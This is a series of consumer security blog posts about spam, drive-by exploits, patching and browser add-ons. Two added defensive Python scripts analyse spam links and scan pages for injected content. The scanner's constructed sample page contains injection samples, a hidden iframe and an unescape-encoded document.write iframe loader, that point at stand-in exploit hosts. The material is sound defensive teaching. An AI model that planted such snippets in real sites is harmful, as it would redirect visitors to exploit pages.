Spyware


A new twist on an old scam: someone reported to me a spam e-mail that appeared to come from Microsoft. A quick bit of research online showed this has been around for a few years, but now with a different twist.

Sample Spam

As you can see, this was the entire body of the e-mail. Nothing to sell. No e-cards to click on. No official document from some bogus US court. Just three innocent-looking links from everyone's friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and that they are being kind enough to add an Unsubscribe link. Since you never subscribed to this in the first place, they are hoping people will click the Unsubscribe link so they won't have it sent anymore. All because they respect your privacy.

Taking a closer look at the three links, they all lead to the same URL. The IP address behind that URL was allocated in the USA. A quick Google search of the domain turned up a lot of Russian-language pages referencing it. On closer inspection, all this URL did was redirect you to a site registered in Korea. This gives you a little more insight into how spam e-mail can be a threat. Had this trail been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have been run against the PC, and if it was not patched, remote code execution would have been possible, meaning the PC would have been added to someone's criminal botnet and used in nefarious ways.
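To make the "all three links lead to the same place" check concrete, here is an added Python example that is not part of the original post. It pulls every link out of a constructed HTML e-mail body, compares the domain shown in the link text with the domain the link really goes to, and walks a redirect chain through a caller-supplied fetch function. The fetch function here is a constructed fake, and the hostnames spam-redirector.example and landing.example.kr are made up.

```python
"""Where do the links in a spam e-mail really go?  Added example, not the original post's code."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LinkCollector(HTMLParser):
    """Collect (visible text, href) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []      # list of (text, href)
        self._href = None    # href of the <a> currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def _host_of(value):
    """Hostname of a URL, or of bare text such as 'www.msn.com/featured' (treated as http://...)."""
    if "://" not in value:
        value = "http://" + value
    return (urlparse(value).hostname or "").lower()


def analyze_links(html):
    """One record per link: text shown, real href, its host, and whether the text looks like
    a domain that differs from the real host (the classic phishing tell)."""
    collector = LinkCollector()
    collector.feed(html)
    records = []
    for text, href in collector.links:
        real_host = _host_of(href)
        shown_host = _host_of(text)
        mismatch = "." in shown_host and shown_host != real_host
        records.append({"text": text, "href": href, "host": real_host,
                        "text_host_mismatch": mismatch})
    return records


def summarize(records):
    hosts = {r["host"] for r in records}
    return {
        "link_count": len(records),
        "distinct_hosts": sorted(hosts),
        "all_same_host": len(hosts) == 1,
        "mismatched": [r["text"] for r in records if r["text_host_mismatch"]],
    }


def follow_redirects(url, fetch, max_hops=10):
    """Walk an HTTP redirect chain.  fetch(url) -> (status, location) is supplied by the
    caller so this can run offline; returns every URL visited, in order, hop-limited."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in (301, 302, 303, 307, 308) or not location:
            break
        chain.append(urljoin(chain[-1], location))
    return chain


# Constructed sample, modelled on the "MSN Featured Offers" mail described above.
SAMPLE_MAIL = """
<p>You are receiving this because you subscribed to
<a href="http://spam-redirector.example/go?id=123">www.msn.com/featured</a>.</p>
<p>To stop receiving these offers, <a href="http://spam-redirector.example/go?id=123">Unsubscribe</a>.</p>
<p>We respect your privacy: <a href="http://spam-redirector.example/go?id=123">www.microsoft.com/privacy</a></p>
"""

# Constructed stand-in for real HTTP responses (made-up hostnames, no network needed).
FAKE_RESPONSES = {
    "http://spam-redirector.example/go?id=123": (302, "http://landing.example.kr/index.html"),
    "http://landing.example.kr/index.html": (200, None),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    records = analyze_links(SAMPLE_MAIL)
    print(summarize(records))
    print(follow_redirects(records[1]["href"], fake_fetch))
```

With a real fetch built on urllib.request (issue HEAD requests and disable automatic redirects so you see every hop), run this from an isolated analysis box, never from the user's PC, since the final landing page is exactly where the exploits are served.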

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.

Stories came out last week that the folks in Redmond had a closed-door meeting with law enforcement. Here is an excerpt about this story.

Botnet fighters have another tool in their arsenal, thanks to the folks at Microsoft. The software vendor is giving law enforcers access to a special tool that keeps tabs on botnets, using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool that ships with Windows. Microsoft is reluctant to give out details on its botnet buster; the company said that even revealing its name could give cyber criminals a clue on how to thwart it.

Microsoft company executives discussed it at a closed-door conference held for law enforcement professionals Monday. The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft’s users, said Tim Cranton, associate general counsel with Microsoft’s World Wide Internet Safety Programs. “I think of it … as botnet intelligence,” he said.

Kind of cool, I thought. But it makes one wonder how much information Microsoft is keeping on its customers, who are the majority of the folks online.

Stay safe and have a great week!!

Hope your weekend has gone well for everyone. Tonight, I’m blogging about why attackers pick on Facebook and MySpace users. Why do you think they do? If your answer is the sheer number of Facebook and MySpace users, that tells you why. Attackers want to make the biggest bang with their attacks.

Most people who surf the Internet do it with Microsoft’s Internet Explorer (version 6 or 7). Attackers are starting to exploit vulnerabilities in several widely installed IE plug-ins to install their malicious software when users are coerced or tricked into visiting one of several web sites. That, my friends, is called social engineering, and it is probably being done through spam e-mail.

This past Friday, Symantec was seeing malicious sites running exploits against some Internet Explorer plug-ins, a set of ActiveX controls produced by Aurigma, a tech company whose image-transfer browser plug-in is licensed and distributed by some heavyweight web portals to help their users upload pictures. Those heavyweight sites include Facebook and MySpace. Symantec warns that if visitors don’t have the Aurigma plug-ins installed, the sites will look for other vulnerable IE plug-ins, including two recently discovered ones from Yahoo and another in QuickTime that Apple patched last month. I go to many sites to gather information for stories, and one is Brian Krebs, who writes a security blog for the Washington Post. Click here to read his story on this topic; included in it is an image of the malicious page people are directed to, which asks for their login credentials. Notice the .cn at the end of the web address in that picture: .cn is a country-code top-level domain, and .CN is China. .HK (Hong Kong) is another one that seems to host many malicious pages. One caveat: the country code tells you where the domain name was registered, not necessarily where the server that serves the page actually sits.

Well, have a great week. We are in the last week of February and the weather has to be getting better soon. Stay safe and we’ll talk again later this week.

Just yesterday we got an alert about an Adobe Reader flaw that is being exploited in the wild. Adobe came out with an updated version of Adobe Reader on Wednesday of this week; you want to upgrade to version 8.1.2 now. These exploits have been found both in banner ads and in spam e-mail attachments. These dirty rotten criminal hacker scoundrels are attacking this application because it is so widely used, and most people don’t update their copy of Adobe Reader.

If you are a reader of my blog, you know there are tools out there to check that your software is up to date. The one I really like is the Shavlik Google gadget. It checks many of these third-party applications and tells you when an update is available. If you use this Google gadget, run it and patch. The one thing you can do that will protect you the most is to patch your applications.

Patch and be happy.  Stay safe and have a great weekend!!

I wrote about the 94,000 legitimate sites that had JavaScript injected into their pages so that they now redirect visitors to a couple of servers in China. Not a good deal, so I thought about how one can defend against this type of attack.

If you’ve been reading my blog, then you know I’m a user of the Firefox browser. I have documented reasons why it is a safer browser to use; if you haven’t read them, look back and find those postings. This JavaScript injection is not going to go away, so one way of defending yourself is to download the NoScript add-on for the Firefox browser. If you are currently a user of Firefox, then click here to install this handy little add-on. What it does is allow JavaScript, Java, and other executable content to run only if you allow it. You set up trusted sites that are allowed to run what you want. One caveat: if the compromised site is one you have already trusted, an inline script injected into that site’s own pages will run; what stays blocked is the external script the injection pulls from the attacker’s host, until you explicitly allow that host too. This is a fantastic tool in your arsenal to fight the bad guys. Install it today and feel better when browsing the Internet.

Stay safe out there and be careful.

If you got left off the Storm Worm’s Christmas card list, maybe you will be lucky enough to get their Happy New Year e-mail. Like I said, behavior is the BEST weapon you have. If you didn’t get the Christmas e-mail, and you are lucky enough to get the Happy New Year version, they want you to download a payload that runs exploits against several vulnerabilities, and if you aren’t patched, you are welcomed into the Storm botnet. Sometimes they even go after vulnerabilities called zero-days, which means there is no patch yet. Stay safe out there and don’t fall for this social engineering tactic.

Hope you all had a great Christmas and have a safe New Year’s celebration.

I assist my church with their computers. In the last 6 months, they purchased a couple of Vista machines. I am new to Vista; at work and at home, I’m an XP guy when it comes to Windows. Initially, when I looked at tools that were Vista compatible, I found that one of my favorites, AVG Anti-Spyware, didn’t work. So I went to Spybot Search and Destroy, and that worked for me. I figured it would be just a matter of time before AVG made their spyware removal tool Vista compatible.

Not sure when it happened, but it is here. So if you are a Vista user, check out the free version of AVG’s spyware removal software. It helps clean the machine of tracking cookies as well as some of the nasty malicious software people run into at times. I saw a forecast that 2008 will probably be a big year for Vista patches; last Tuesday’s patch cycle included a bunch of Vista fixes. With more and more people going to Vista, attackers will shift toward finding Vista vulnerabilities, because the numbers make it a more attractive target.

Many things will keep you safe on the Internet, but your behavior is probably the biggest thing you can control to protect yourself. It takes many steps, so keep reading. I’ll keep you informed as things come up, and make comments if you would like. I’m getting tired of all the nasty spam comments that I just delete. Stay safe and get that Christmas shopping done!

With Christmas right around the corner, it’s a good time to talk about Internet safety. Spammers work overtime this time of year to try to trick you into giving up your personal information. Sometimes spam can look really authentic. So I ring the warning bell: be very careful when going through your e-mail inbox.

And the bad thing is, after Christmas you will start seeing spam e-mail that appears to be from the IRS. They’ll tell you to track your refund, and all you have to do is give them some really valuable information: probably name, address, and of course your SSN. The IRS doesn’t have an e-mail service that tracks and tells you where your refund is.

This is just a reminder that you really need to be vigilant. Question EVERYTHING that comes via e-mail. And be vigilant when people on the phone ask you for information. Create your own “Need to Know” policy. Protect your information; it is up to you. Little things you can do will protect you and keep you from being taken advantage of.

OK, now for a little football. I’m a KC Chiefs fan, and it has been a REALLY long season. I think I read it is now 7 losses in a row. This really is proof that I am a fan; I don’t jump on the bandwagon of another team. I just hope that the KC Chiefs get what they want for Christmas. Let’s see: a new offensive line would be nice. A healthy Larry Johnson. A new offensive coordinator. A good YOUNG kicker. Wow, I hope we’ve been good, because our list is long.

Stay safe, and question everything.  Hope your Holiday season is a blessed one.  Talk soon.

Hi. It’s been a few days since my last post. In my part of the world, we had a pretty bad ice storm; power was knocked out and my Internet connection was down for a few days. It’s snowing now, so I’m really in a Winter Wonderland!

In a previous post, I mentioned that Apple’s QuickTime had a security problem with no patch. Late Thursday, Apple released a new version of QuickTime. If Apple’s updater software hasn’t notified you that there is a new version, just open QuickTime and you will be told that version 7.3.1 is available. Update it now. This vulnerability is being exploited in the wild, which means bad people are sending spam e-mail right now with malformed QuickTime files, and if they trick you into clicking, they can do bad things. Any time you hear the words remote code execution associated with a vulnerability, it means the attacker can run their own programs on your PC: add keyloggers, steal cookies, steal files. That should scare you into patching your software. If you are an iTunes person, just grab the iTunes download, because QuickTime comes with iTunes.

Just remember, as the holiday season comes in, bad people send many different types of spam e-mail, from e-cards to more official-looking things like a notice that you changed your PayPal password, or your financial institution wanting you to click a link inside the e-mail and type in your banking credentials so they can steal you blind.

Play it smart. Remember: NEVER trust e-mails. Always question before you go and type in account numbers, passwords, PIN numbers, etc. Stay safe, and if you are in the middle of the country, drive safely. That is all for now. I’ll try to post another story before Monday.

There is a new zero-day exploit out there for Apple’s QuickTime application. If you have installed iTunes from Apple, then you have QuickTime installed too. The vulnerability is in QuickTime’s handling of RTSP (Real Time Streaming Protocol). Apple currently has no patch for this vulnerability and has made no public announcement, which is standard practice for Apple. There will be a patch from Apple soon, so we’ll have to keep an eye out for it.

This is one of those situations where all you have to do is visit a website hosting a malicious page and you will be attacked. The page uses a small iframe tag in its HTML that redirects the visitor to the exploit site, where the RTSP attack is carried out and the malicious code is installed on the user’s system.
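The tiny-iframe redirect described here and the injected JavaScript on the 94,000 legitimate sites in the earlier post leave the same kind of footprint in a page’s HTML, so here is one added Python example, not the original post’s code, that scans a saved page for both: iframes that are tiny, hidden by style, or pointed off-site; script tags loaded from another host; and inline scripts that document.write() an iframe (commonly wrapped in unescape()). The sample page and the hostnames bad-host.example and exploit-host.example are constructed for the example.

```python
"""Spot injected hidden iframes and suspicious scripts in a saved HTML page.
Added example, not the original post's code; the sample page and hostnames are made up."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _pixels(value):
    """Turn a width/height attribute such as '1', '0px' or '100%' into an int, or None."""
    if value is None:
        return None
    value = value.strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


def _hidden_by_style(style):
    compact = (style or "").replace(" ", "").lower()
    return "display:none" in compact or "visibility:hidden" in compact


class InjectionScanner(HTMLParser):
    """Collects findings for iframes that are tiny/hidden/off-site, external <script src>,
    and inline scripts that write an iframe into the page at load time."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        external = bool(host) and host != self.page_host
        if tag == "iframe":
            reasons = []
            w, h = _pixels(a.get("width")), _pixels(a.get("height"))
            if (w is not None and w <= 1) or (h is not None and h <= 1):
                reasons.append("tiny")
            if _hidden_by_style(a.get("style")):
                reasons.append("hidden-style")
            if external:
                reasons.append("external-src")
            if reasons:
                self.findings.append({"tag": "iframe", "src": src, "host": host, "reasons": reasons})
        elif tag == "script":
            self._in_inline_script = not src   # a <script> without src has an inline body
            if external:
                self.findings.append({"tag": "script", "src": src, "host": host, "reasons": ["external-src"]})

    def handle_data(self, data):
        # HTMLParser hands the body of an inline <script> to handle_data in one chunk.
        if self._in_inline_script:
            body = data.lower()
            if "document.write" in body and ("unescape(" in body or "<iframe" in body or "%3ciframe" in body):
                self.findings.append({"tag": "script", "src": "", "host": "", "reasons": ["writes-iframe"]})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def scan_page(html, page_host):
    """Return the list of findings for one page; page_host is the site's own hostname."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal page with three injected items (made-up hostnames).
SAMPLE_PAGE = """<html><head><title>Example site</title>
<script src="/js/site.js"></script>
<script src="http://bad-host.example/counter.js"></script>
</head><body>
<h1>Welcome</h1>
<p>Service times and directions.</p>
<iframe src="http://exploit-host.example/in.html" width="1" height="1" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://exploit-host.example/in.html%22 width=1 height=1%3E%3C/iframe%3E'))</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "www.victim-site.example"):
        print(finding)
```

Run it over pages fetched from an isolated box (or over a saved copy) rather than opening them in your own browser; an off-site iframe on its own is not proof of compromise, but a 1x1 hidden one pointing at a host you have never heard of is exactly what the injected pages described in these posts look like.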

Symantec, which monitors websites serving up this malicious code, has found a porn site that is actively serving it. Just as a side note, what a job that must be for whoever at Symantec has to monitor that porn site. LOL! Anyway, they also note that this is probably being served up at other sites too.

So let’s repeat ourselves. Don’t surf porn. Don’t use P2P. This may not keep you safe, but it will help you avoid this bad stuff. Don’t click on links in unsolicited e-mails and don’t open attachments in unsolicited e-mails.

Stay safe and have a great rest of the week!
